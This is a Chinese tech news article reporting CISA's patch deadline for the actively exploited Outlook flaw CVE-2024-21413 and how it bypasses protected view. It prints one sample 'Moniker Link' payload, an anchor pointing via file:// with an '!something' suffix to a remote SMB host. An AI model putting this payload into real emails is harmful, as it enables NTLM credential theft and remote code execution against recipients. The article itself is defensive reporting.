设置
  • 日夜间
    随系统
    浅色
    深色
  • 主题色

微软 Outlook 被曝高危漏洞,可绕过保护视图远程执行任意代码

2025/2/7 9:50:10 来源:IT之家 作者:故渊 责编:故渊

IT之家 2 月 7 日消息,美国网络安全和基础设施安全局(CISA)本周四发布公告,要求美国联邦机构在 3 周内(2 月 27 日前)为其系统部署补丁,修复微软 Outlook 高危远程代码执行漏洞。

该漏洞由来自网络安全公司 Check Point Research 的安全专家 Haifei Li 率先发现,追踪编号为 CVE-2024-21413。

CISA 表示目前已经有证据表明,有黑客利用该漏洞发起攻击。攻击者可以绕过保护视图(该视图应以只读模式打开 Office 文件以阻止嵌入其中的有害内容),并以编辑模式打开恶意 Office 文件,从而获得远程代码执行能力。

攻击者利用名为“Moniker Link”的安全方式,绕过 Outlook 内置的恶意链接保护,使用 file:// 协议,并在指向攻击者控制服务器的 URL 中添加感叹号和随机文本(例如 "!something"),嵌入到电子邮件中。

IT之家附上示例如下:

*<a href="file:///\\10.10.111.111\test\test.rtf!something">CLICK ME</a>*

CVE-2024-21413 影响多个 Office 产品,包括 Microsoft Office LTSC 2021、Microsoft 365 Apps for Enterprise、Microsoft Outlook 2016 和 Microsoft Office 2019。

黑客成功攻击后,可以窃取 NTLM 凭据,以及通过恶意制作的 Office 文档执行任意代码。CISA 已将此漏洞添加到其已知被利用漏洞 (KEV) 目录中,并将其标记为正在被积极利用。

CISA 强调,这类漏洞是恶意网络行为者常用的攻击途径,对联邦企业构成重大风险。虽然 CISA 主要关注提醒联邦机构尽快修补漏洞,但也建议私营机构优先修补这些漏洞,以阻止正在进行的攻击。

广告声明:文内含有的对外跳转链接(包括不限于超链接、二维码、口令等形式),用于传递更多信息,节省甄选时间,结果仅供参考,IT之家所有文章均包含本声明。

相关文章

关键词:Outlook微软

软媒旗下网站: IT之家 最会买 - 返利返现优惠券 iPhone之家 Win7之家 Win10之家 Win11之家

软媒旗下软件: 软媒手机APP应用 魔方 最会买 要知